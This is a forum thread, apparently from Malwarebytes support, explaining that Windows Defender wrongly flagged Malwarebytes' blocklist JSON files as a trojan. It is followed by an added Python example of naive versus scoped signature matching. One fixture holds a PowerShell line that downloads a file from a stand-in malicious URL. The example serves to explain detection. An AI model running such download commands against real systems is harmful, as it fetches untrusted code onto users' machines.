cfoster8

Trojan found in Malwarebytes product


I'm 99% sure. These files have been created by us for a while, and from the logs provided, they are being provided correctly but Defender is flagging them, most likely because we store metadata about different infections in these files (not actual infections, just information).


Please give us more information if you get it, but I guess I shouldn't worry about this?


I merged all the topics together to help keep this information in one place. There are a few things that you can do to help here as well:

  1. In Windows Defender, add an exclusion for C:\ProgramData\Malwarebytes\mbamservice. Since this is the folder we use to store all of our data, and it's protected by our Self-Protection module, you can safely exclude this folder from Defender.
  2. Report this detection to Microsoft using their False Positive page: https://www.microsoft.com/en-us/wdsi/filesubmission. You will need to find one of the sample JSON files in the Defender quarantine to submit.

We are also reaching out to Microsoft with this information, but user reports go a long way for companies in these situations.


We just got word from Microsoft that this was a false positive on their end and should now be resolved.

1 hour ago, Tezzle said:

So, I can safely reinstall Malwarebytes? There's nothing to worry about?

Yes, it was a false positive by Microsoft as I suggested earlier. Microsoft has now confirmed it and has corrected it so users of Windows Defender will no longer see these detections. The issue was as I speculated, overly aggressive heuristics in their detection signatures. They were using basic text string detection to flag any file containing a specific known malicious URL. Since Malwarebytes blocks malicious websites and stores some of the black list information in some of these .JSON files, it means that the Windows Defender signature would flag these files when this string of text was found, misidentifying them as threats when they were just benign data files.

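The false-positive mechanism described in the post above, as an added example that is not part of the original thread and is not Malwarebytes' or Microsoft's code. The URL, file names and sample contents are constructed, and the "skip pure JSON data" scoping is an assumed mitigation chosen for illustration; the thread does not show the actual signature or its fix.

```python
import json

# Constructed indicator (example.invalid never resolves); not a real IoC.
BLOCKED_URL = b"http://bad.example.invalid/a"

# Constructed sample files, keyed by hypothetical file name.
SAMPLES = {
    # Blocklist metadata like the JSON data files described in the thread.
    "blocklist.json": json.dumps(
        {"blocked_urls": [BLOCKED_URL.decode()], "category": "trojan"}
    ).encode(),
    # A script that would actually contact the URL.
    "fetch.ps1": b"Invoke-WebRequest " + BLOCKED_URL + b" -OutFile a.bin\n",
    # Unrelated file with no indicator at all.
    "notes.txt": b"quarterly report draft\n",
}

def naive_rule(data: bytes) -> bool:
    """String-only signature: fires on any file containing the URL."""
    return BLOCKED_URL in data

def is_inert_json(data: bytes) -> bool:
    """True when the whole file parses as JSON, i.e. it is pure data."""
    try:
        json.loads(data.decode("utf-8"))
        return True
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return False

def scoped_rule(data: bytes) -> bool:
    """Same string match, but not applied to files that are only JSON data."""
    return naive_rule(data) and not is_inert_json(data)

def flagged(rule, samples=SAMPLES):
    """Names of the sample files a rule would detect, sorted."""
    return sorted(name for name, data in samples.items() if rule(data))

if __name__ == "__main__":
    print("naive :", flagged(naive_rule))   # blocklist and script both hit
    print("scoped:", flagged(scoped_rule))  # only the script hits
```

Running a candidate signature over a corpus of known-benign security-product data files in this way is a cheap regression check before a rule ships.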
